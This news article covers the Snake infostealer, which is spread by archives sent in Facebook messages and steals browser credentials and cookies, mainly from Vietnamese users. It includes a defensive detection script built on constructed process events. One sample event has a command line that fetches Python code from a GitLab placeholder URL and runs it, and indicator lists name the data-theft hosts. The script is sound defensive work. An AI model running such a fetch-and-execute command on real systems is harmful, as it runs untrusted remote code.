Facebook messages hijacked to steal personal info and details

New research has revealed that threat actors are leveraging Facebook messages to deploy a sophisticated Python-based infostealer, known as Snake.

Researchers at Cybereason have shared details of the attack, indicating that Snake's primary objective is to capture sensitive data and credentials from unsuspecting users.

The campaign appears to be relatively new: it was first brought to light on X in August 2023, and it shows a clear bias towards Vietnamese victims.

Facebook infostealer targeting Vietnamese users

The attack uses seemingly harmless RAR or ZIP files delivered over Facebook messages. Once opened, they trigger an infection sequence that involves two additional downloaders – a batch script and a cmd script. The cmd script is responsible for fetching and executing the Snake infostealer from an actor-controlled GitLab repository.

Cybereason has identified three distinct variants of the Snake infostealer. The third is an executable assembled with PyInstaller and additionally targets users of the Coc Coc browser, a Chromium-based browser popular in Vietnam, which suggests a specific focus on Vietnamese users.

Once harvested, credentials and cookies are exfiltrated through several platforms, including Discord, GitHub, and Telegram.

The malware also targets Facebook accounts specifically by extracting cookie information, which points to account hijacking as a goal: a valid session cookie can be replayed to use the account without the password.

The connection to Vietnam is further reinforced by the naming conventions of the actor-controlled repositories and by Vietnamese-language strings reportedly present in the source code.

Cybereason also noted that the malware targets other browsers used globally, including Brave, Chromium, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera.
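The infection chain above (archive, then batch script, then cmd script, then a Python payload pulled from GitLab) and the exfiltration to Discord, GitHub or Telegram give a defender several stages to correlate. The following is an added example, not code from the article or from Cybereason, showing how a simple process-tree and network-connection correlation could flag that chain. The event records are constructed for this example, the field names only loosely follow Sysmon event IDs 1 and 3, and the file paths, pids and hostnames are assumptions rather than indicators from the campaign.

```python
"""Toy detection of the Snake infection chain over constructed
process-creation and network-connection events.  Field names loosely
follow Sysmon event ID 1 (process create) and 3 (network connect);
nothing here is real telemetry from the campaign."""
import re
from collections import defaultdict

# Indicators taken from the article: scripts staged from an extracted archive
# or temp directory, a cmd/batch parent, the payload pulled from GitLab, and
# loot pushed to Discord, GitHub or Telegram.  Hostnames are assumptions.
STAGING_DIRS = re.compile(r"\\(Temp|Downloads)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(bat|cmd)\b", re.I)
PAYLOAD_HOSTS = ("gitlab.com",)
EXFIL_HOSTS = ("discord.com", "discordapp.com", "api.telegram.org",
               "github.com", "api.github.com")

# Constructed sample events (not from the campaign); pids are made up.
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # User opens the archive and runs the batch file inside it.
    {"id": 1, "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\u\Downloads\invoice\setup.bat"'},
    # Batch drops a cmd script into Temp and runs it.
    {"id": 1, "pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\run.cmd"},
    # cmd script launches a Python runtime that fetches the stealer from GitLab.
    {"id": 1, "pid": 400, "ppid": 300,
     "image": r"C:\Users\u\AppData\Local\Temp\py\python.exe",
     "cmd": "python.exe -c \"exec(__import__('urllib.request').request."
            "urlopen('https://gitlab.com/example/raw/main/s.py').read())\""},
    {"id": 3, "pid": 400, "dest": "gitlab.com"},
    {"id": 3, "pid": 400, "dest": "discord.com"},
    # Benign: a developer's python.exe talking to GitLab from a normal install.
    {"id": 1, "pid": 500, "ppid": 100, "image": r"C:\Python311\python.exe",
     "cmd": "python.exe build.py"},
    {"id": 3, "pid": 500, "dest": "gitlab.com"},
]


def build_tables(events):
    """Index process-create events by pid and network destinations by pid."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    conns = defaultdict(set)
    for e in events:
        if e["id"] == 3:
            conns[e["pid"]].add(e["dest"].lower())
    return procs, conns


def ancestry(procs, pid):
    """The process record followed by its parents, root last."""
    chain = []
    while pid in procs:
        chain.append(procs[pid])
        pid = procs[pid]["ppid"]
    return chain


def indicators(procs, conns, pid):
    """Names of the chain indicators one process matches, sorted."""
    chain = ancestry(procs, pid)
    me, parents = chain[0], chain[1:]
    hits = set()
    # Variant 3 is a PyInstaller executable, so key on the launch location
    # rather than on the image being named python.exe.
    if STAGING_DIRS.search(me["image"]):
        hits.add("image_in_staging_dir")
    if any(h in me["cmd"].lower() for h in PAYLOAD_HOSTS):
        hits.add("payload_from_gitlab")
    if any(p["image"].lower().endswith("cmd.exe")
           and SCRIPT_EXT.search(p["cmd"]) and STAGING_DIRS.search(p["cmd"])
           for p in parents):
        hits.add("cmd_script_ancestor")
    if conns[pid] & set(EXFIL_HOSTS):
        hits.add("exfil_host_connection")
    return sorted(hits)


def detect(events, min_hits=3):
    """Map pid -> matched indicators for processes at or above the threshold."""
    procs, conns = build_tables(events)
    findings = {}
    for pid in procs:
        hits = indicators(procs, conns, pid)
        if len(hits) >= min_hits:
            findings[pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in detect(EVENTS).items():
        print(pid, hits)
```

Requiring several indicators together is what keeps the benign developer process quiet: a lone connection to GitLab or GitHub is everyday traffic, but a binary launched from Temp by a cmd script, pulling code from GitLab and then talking to Discord, is the chain the article describes. In a real deployment the hostnames would be replaced with the organisation's own allow-list and the threshold tuned against the noise on its endpoints.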

The discovery comes amid increased scrutiny of Facebook for its perceived failure to assist victims of account takeovers.

TechRadar Pro has asked Meta to share information about how users can boost their protection against such attacks, and whether the company has any plans to prevent future attacks. In the meantime, users can follow best practices to help protect their accounts, including using complex passwords and two-factor authentication (2FA). Note that neither stops an attacker who already holds a stolen session cookie, so anyone who has opened an unexpected archive from a Facebook message should also change their password and sign out of all other sessions from Facebook's security settings.

Craig Hale
